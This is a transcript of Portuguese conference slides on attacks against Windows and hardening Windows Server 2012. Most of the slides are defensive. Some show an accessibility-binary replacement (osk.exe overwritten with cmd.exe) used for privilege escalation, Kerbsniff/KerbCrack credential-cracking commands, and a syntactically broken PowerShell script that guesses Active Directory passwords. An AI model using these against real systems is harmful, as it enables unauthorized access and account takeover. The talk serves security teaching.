Windows Server
Transcrição
Windows Server
Hacking Windows Systems Ataques e Defesas Hacking Day 2013 Princípios de segurança e novidades do Windows Server 2012 DANIEL DONDA MVP Windows Expert-IT Pro MCP,MCT,MCITP-EA, MCSA+Security, MCSE+Security, MCSE+Messaging EC-CEH V8 | EC-CEI www.mcsesolution.com | www.infosecbrasil.org twitter: @danieldonda http://mvp.microsoft.com/pt-br/ 1 Agenda • Apresentação • Segurança e Microsoft – Uma analise através do tempo • Porque é fácil atacar o Windows ? • O Windows sem Windows (Reduzindo a superfície de ataque) • Hardening Windows Server 2012 • Kerbsniff, KerbCrack e o Kerberos Armoring • 10 importantes recursos e dicas MSFT 2 Metas para a sessão de hoje Princípios de segurança e novidades 3 Segurança e Microsoft – Uma analise através do tempo Windows History • • • • • • • • • • • 1975–1981: Microsoft inicia. 1981 – MS-DOS 1982–1985: Windows 1.0 1987–1992: Windows 2.0–2.11 1990–1994: Windows 3.0–Windows NT 1995–2001: Windows 95 1998–2000: Windows 98, Windows 2000, Windows Me - Internet 2001–2005: Windows XP - Consciência de vírus de computador e hackers 2006–2008: Windows Vista – 1,5 milhões de dispositivos são compatíveis 2009: Windows 7 - 8 Milhões de beta-testers no mundo 2012: Windows 8 – Recursos avançados de segurança 5 Porque é fácil atacar o Windows ? 6 Atacando o Windows 1 – Usuário / Admin (60.000.000) 2 – Softwares desnecessários 3 – Configuração Incorreta 4 – Softwares desatualizados 5 – OS desatualizado 5 – Falta de conhecimento 7 1 - Elevação de privilégio CD\Windows\System32\ COPY OSK.EXE OSK.OLD2 takeown /F osk.exe cacls osk.exe /G Administrator:F /E COPY CMD.EXE OSK.EXE 8 2 - Kerberos Atack vs Kerberos Armoring Kerbsniff kerbs.txt KerbCrack kerbs.txt –d kgodoi http://ntsecurity.nu/toolbox/kerbcrack/ RFC 6113 - Flexible Authentication Secure Tunnel (FAST) 3- Proteção de acesso a dados – SMB 3.0 01001010110111011101010111011101011011 net use x: \\servidor\dados x: type senhas.txt Servidor SMB 3 utiliza um novo algoritmo para assinatura - AES-CMAC em vez do HMAC-SHA256 usado por SMB 2. 10 Proteção de acesso a dados - DAC • Dynamic Access Control • Controlar quem pode acessar informação e auditar quem teve acesso a informação. • Classificar arquivos para toda a corporação. • Auditar o acesso a arquivos usando as diretivas de auditoria centrais para • geração de relatórios de conformidade e análise forense. • Aplicar proteção Rights Management Services (RMS) 11 O Windows sem Windows Reduzindo a superfície de ataque 12 Windows Server Core Menos uso de recursos Menos serviços e recursos Menos reboot Redução de Updates em até 70% Menos superfície de ataque 13 Recursos do Server Core Active Directory Certificate Services Active Directory Domain Services DHCP Server DNS Server File Services (including File Server Resource Manager) Active Directory Lightweight Directory Services (AD LDS) Hyper-V Print and Document Services Streaming Media Services Web Server (including a subset of ASP.NET) Windows Server Update Server Active Directory Rights Management Server Routing and Remote Access Server 14 Opções do Server Core disponível disponível disponível Windows PowerShell / Windows disponíveis .NET disponíveis Gerenciador do Servidor não disponível disponível Console de Gerenciamento Microsoft não disponível disponível Painel de Controle não disponível não disponível Miniaplicativos do Painel de Controle não disponíveis alguns disponíveis Windows Explorer não disponível não disponível disponível Barra de tarefas não disponível não disponível disponível Área de notificação não disponível não disponível disponível Internet Explorer não disponível não disponível disponível Sistema de ajuda integrado não disponível não disponível disponível Temas não disponíveis não disponíveis não disponíveis disponíveis tela Iniciar estilo Metro não disponível não disponível não disponível disponível Aplicativos estilo Metro não disponíveis não disponíveis não disponíveis disponíveis Windows Media Player não disponível não disponível não disponível disponível 15 disponíveis Recurso Experiência Desktop instalado disponível disponível disponível disponíveis disponíveis disponível disponível disponível disponíveis disponível disponível disponível disponível disponível Server-Gui-Mgmt-Infra, Server-Gui-Shell, Desktop-Experience disponível Opção de instalação Servidor com GUI Server-Gui-Mgmt-Infra, Server-Gui-Shell Prompt de comando Interface Mínima do Servidor Server-Gui-Mgmt-Infra Opção de instalação do Server Core O que é o Microsoft Hyper-V Server? Microsoft hypervisor • Command Line Interface • Não possui licença de SO • Standalone Hyper-V • Download gratuito do ISO • Gerenciamento Remoto 16 Hardening Windows Server 2012 17 Features on Demand • PowerShell • DISM 18 Security Configuration Wizard 19 Password Settings Object 20 10 importantes recursos e dicas da MSFT 21 1-Microsoft Security Intelligence Report O Microsoft Security Intelligence Report (SIR) é um relatório trimestral sobre vulnerabilidades de software, exploração de vulnerabilidades de software e softwares maliciosos e potencialmente indesejados. www.microsoft.com/sir 22 2 - Microsoft Security Response Center • O Microsoft Security Response Center (MSRC) identifica, monitora, resolve, e responde a incidentes de segurança e vulnerabilidades de segurança de software Microsoft. • Estamos em 24 horas de alerta de segurança todos os dias, grupos de notícias de segurança, monitorar e responder a mais de 100.000 e-mails de clientes anualmente enviados para [email protected]. http://www.microsoft.com/security/msrc/default.aspx 23 3 - Microsoft Security Compliance Manager • O SCM é uma ferramenta gratuita da Microsoft que permite configurar rapidamente e gerenciar os computadores em seu ambiente com Diretiva de Grupo e Microsoft System Center Configuration Manager. • SCM fornece prontos para implantar políticas e pacotes de configuração baseadas em recomendações da guia de segurança e melhores práticas da indústria, permitindo que você gerencie facilmente configurações e requisitos de conformidade para os sistemas operacionais Windows. http://technet.microsoft.com/en-us/library/cc677002.aspx 24 4 – Proteção com criptografia • BitLocker e Bitlocker to go • BitLocker utiliza o Advanced Encryption Standard, com 128-bit e 256-bit comprimentos de chave. • EFS (Encrypting File System) • Criptografia de arquivos usando algoritmos RSA ou ECC 25 5 - Freeware Microsoft Tools • • • • • • • • • • • • AccessChk- Essa ferramenta mostra a você os acessos de usuário ou de grupo a arquivos, a chaves do Registro ou serviços AccessEnum - Essa ferramenta de segurança simples, mostra a você quem tem que tipo de acesso a diretórios. Sigcheck - informações sobre a versão do arquivo e verifique se as imagens em seu sistema estão assinadas digitalmente. ShareEnum - Verifique compartilhamentos de arquivos e exiba suas configurações de segurança SDelete - Substitua com segurança seus arquivos confidenciais e libere espaço livre de arquivos excluídos. Account Lockout and Management Tools – Uso muito, principalmente o acctinfo.dll para exibir outros atributos no AD. PortQry Command Line Port Scanner Analise de estado das portas TCP e UDP Port Reporter – Quais portas que são usadas, qual o processo está usando a porta, se o processo é um serviço Port Reporter Parser Tool - Analisador de log para arquivos de log Port Reporter. Promqry and PromqryUI Detecta Sniffers Promiscuos PromqryUI Interface grafica para promqey. Promqry linha de comando para detecção de sniffers no modo promiscuous. Windows SteadyState – Não importa o que aconteça – Vírus, Malware – você pode voltar o seu Windows ao normal http://www.mcsesolution.com/Mcsesolution/lista-de-softwares-freewaremicrosoft-tools.html 26 6 - Windows 8 contra Malware Windows 8 inclui as seguintes tecnologias novas e avançadas que proporcionam melhor defesa contra malware: • Action Center • Secure Boot • User Account Control (UAC) • Biometric Security • Windows Defender • Malicious Software Removal Tool • Windows Firewall 27 7 - O Windows To Go • O Windows To Go é uma imagem de boot do Windows 8 em um drive USB que um usuário pode iniciar em outro computador. Windows to go fornece aos usuários uma cópia portátil de um computador Windows corporativo para fornecer uma experiência de usuário consistente em certos tipos de hotdesk ou remotos cenários de trabalho. 28 8 - PowerShell • ~2,430 cmdlets dsquery user -limit 0 > users foreach ($FDN in Get-Content .\users { $results =dsget user $FDN -samid $samid = $results[1].replace (" ","") Write-host $samid foreach ($password in Get-Content .\password.txt { $password = $password.replace(" "."") dsget user $FDN -u $samid -p $password > $null if ($?) { Write-host "Conta: $samid Senha: $password" } } } http://bit.ly/WinPS-Ebook 29 9 - Newsletter de Segurança • • • • • • • • • • • Dicas de segurança Notícias da comunidade e outras informações de segurança relevantes Biografias dos MVPs (Profissionais Mais Valiosos) de segurança Guias, recursos e práticas recomendadas de segurança Blogs, fóruns, grupos de notícias e sites de segurança Informações sobre o ciclo de vida dos produtos da Microsoft Boletins e atualizações de segurança Editoriais de executivos e especialistas em segurança da Microsoft Webcasts e chats Eventos sobre segurança online e presenciais Laboratórios práticos de segurança da Microsoft http://technet.microsoft.com/pt-br/security/ 30 10 - Microsoft Security on Twitter · @Safer_Online, http://twitter.com/Safer_Online · @MSFTSecResponse, http://twitter.com/msftsecresponse · @MSFTSecurity, http://twitter.com!/msftsecurity · @MSFTmmpc, http://twitter.com/msftmmpc · @MicrosoftDCU, http://twitter.com!/MicrosoftDCU • Microsoft Security on Facebook • · MMPC - http://www.facebook.com/#!/msftmmpc 31 Thank You! Thank you for your time and attention! http://facebook.com/mcsesolution @danieldonda 32